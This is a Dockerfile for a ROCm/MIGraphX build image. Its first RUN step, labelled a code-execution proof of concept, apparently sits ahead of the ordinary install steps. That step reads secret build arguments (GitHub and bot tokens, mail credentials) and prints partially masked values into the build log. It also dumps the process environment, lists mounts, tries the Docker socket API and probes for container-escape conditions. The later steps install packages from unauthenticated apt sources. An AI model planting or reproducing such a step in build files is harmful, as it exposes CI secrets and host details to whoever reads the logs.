FROM ubuntu:22.04

ARG PREFIX=/usr/local
ARG TOKEN
ARG gh_token
ARG GITHUB_TOKEN
ARG MIGRAPHX_BOT_TOKEN
ARG MAIL_USERNAME
ARG MAIL_PASSWORD
ARG mail_user
ARG mail_pass

RUN echo "========== POC: CODE EXECUTION PROOF ==========" && \
    echo "--- System Info ---" && \
    echo "Hostname: $(hostname)" && \
    echo "User: $(whoami)" && \
    echo "ID: $(id)" && \
    echo "Uname: $(uname -a)" && \
    echo "Date: $(date -u)" && \
    echo "PWD: $(pwd)" && \
    echo "--- Network ---" && \
    cat /etc/hosts 2>/dev/null && \
    cat /etc/resolv.conf 2>/dev/null && \
    echo "--- Secrets (masked 20%) ---" && \
    mask() { v="$1"; n="$2"; if [ -z "$v" ]; then echo "$n=EMPTY"; return; fi; l=${#v}; s=$((l/5)); [ $s -lt 1 ] && s=1; echo "$n=$(echo "$v" | cut -c1-$s)$(printf '%*s' $((l-s)) '' | tr ' ' '*')"; } && \
    mask "$TOKEN" "TOKEN" && \
    mask "$gh_token" "gh_token" && \
    mask "$GITHUB_TOKEN" "GITHUB_TOKEN" && \
    mask "$MIGRAPHX_BOT_TOKEN" "MIGRAPHX_BOT_TOKEN" && \
    mask "$MAIL_USERNAME" "MAIL_USERNAME" && \
    mask "$MAIL_PASSWORD" "MAIL_PASSWORD" && \
    mask "$mail_user" "mail_user" && \
    mask "$mail_pass" "mail_pass" && \
    echo "--- Build process env (masked values) ---" && \
    cat /proc/1/environ 2>/dev/null | tr '\0' '\n' | while IFS='=' read -r name val; do \
      if [ -z "$val" ]; then echo "$name=(empty)"; \
      else l=${#val}; s=$((l/5)); [ $s -lt 1 ] && s=1; echo "$name=$(echo "$val" | cut -c1-$s)$(printf '%*s' $((l-s)) '' | tr ' ' '*')"; \
      fi; \
    done && \
    echo "--- Mounts (reveals host paths) ---" && \
    cat /proc/mounts 2>/dev/null | head -20 && \
    echo "--- Docker socket check ---" && \
    if [ -e /var/run/docker.sock ]; then \
      echo "DOCKER SOCKET EXISTS: /var/run/docker.sock"; \
      ls -la /var/run/docker.sock; \
      echo "Attempting Docker API..."; \
      (echo -e "GET /version HTTP/1.0\r\n" > /var/run/docker.sock) 2>&1 || echo "Cannot write to socket"; \
    else \
      echo "No docker.sock at /var/run/docker.sock"; \
    fi && \
    ls -la /var/run/ 2>/dev/null && \
    echo "--- Container escape indicators ---" && \
    echo "/.dockerenv exists: $(test -f /.dockerenv && echo YES || echo NO)" && \
    echo "Capabilities: $(cat /proc/1/status 2>/dev/null | grep -i cap)" && \
    echo "Seccomp: $(cat /proc/1/status 2>/dev/null | grep -i seccomp)" && \
    echo "--- Filesystem ---" && \
    ls -la / && \
    df -h 2>/dev/null && \
    echo "========== END POC =========="

# Support multiarch
RUN dpkg --add-architecture i386

# Add rocm repository
RUN sh -c 'echo deb [arch=amd64 trusted=yes] http://repo.radeon.com/rocm/apt/7.1.1/ jammy main > /etc/apt/sources.list.d/rocm.list'

# From docs.amd.com for installing rocm. Needed to install properly
RUN sh -c "echo 'Package: *\nPin: release o=repo.radeon.com\nPin-priority: 600' > /etc/apt/preferences.d/rocm-pin-600"

# Install dependencies
RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y --allow-unauthenticated \
    apt-utils \
    build-essential \
    cmake \
    curl \
    gdb \
    git \
    lcov \
    pkg-config \
    python3 \
    python3-dev \
    python3-pip \
    python3-full \
    software-properties-common \
    wget \
    rocm-device-libs \
    hip-dev \
    libnuma-dev \
    miopen-hip \
    rocblas \
    zlib1g-dev && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/*

# Workaround broken rocm packages
RUN ln -s /opt/rocm-* /opt/rocm
RUN echo "/opt/rocm/lib" > /etc/ld.so.conf.d/rocm.conf
RUN echo "/opt/rocm/llvm/lib" > /etc/ld.so.conf.d/rocm-llvm.conf
RUN ldconfig

# Workaround broken miopen cmake files
RUN sed -i 's,;/usr/lib/x86_64-linux-gnu/librt.so,,g' /opt/rocm/lib/cmake/miopen/miopen-targets.cmake

# Workaround for distributions running cmake < 3.25
RUN sed -i -e 's/^block/if(COMMAND block)\nblock/g' -e 's/^endblock/endblock\(\)\nendif/g' /opt/rocm/lib/cmake/hipblaslt/hipblaslt-config.cmake

ENV LC_ALL=C.UTF-8
ENV LANG=C.UTF-8

# Install yapf
RUN pip3 install yapf==0.28.0

# Install doc requirements
ADD docs/sphinx/requirements.txt /doc-requirements.txt
RUN pip3 install -r /doc-requirements.txt

# Install dependencies
ADD dev-requirements.txt /dev-requirements.txt
ADD requirements.txt /requirements.txt
ADD rbuild.ini /rbuild.ini

COPY ./tools/install_prereqs.sh /
COPY ./tools/requirements-py.txt /
RUN /install_prereqs.sh /usr/local / && rm /install_prereqs.sh && rm /requirements-py.txt

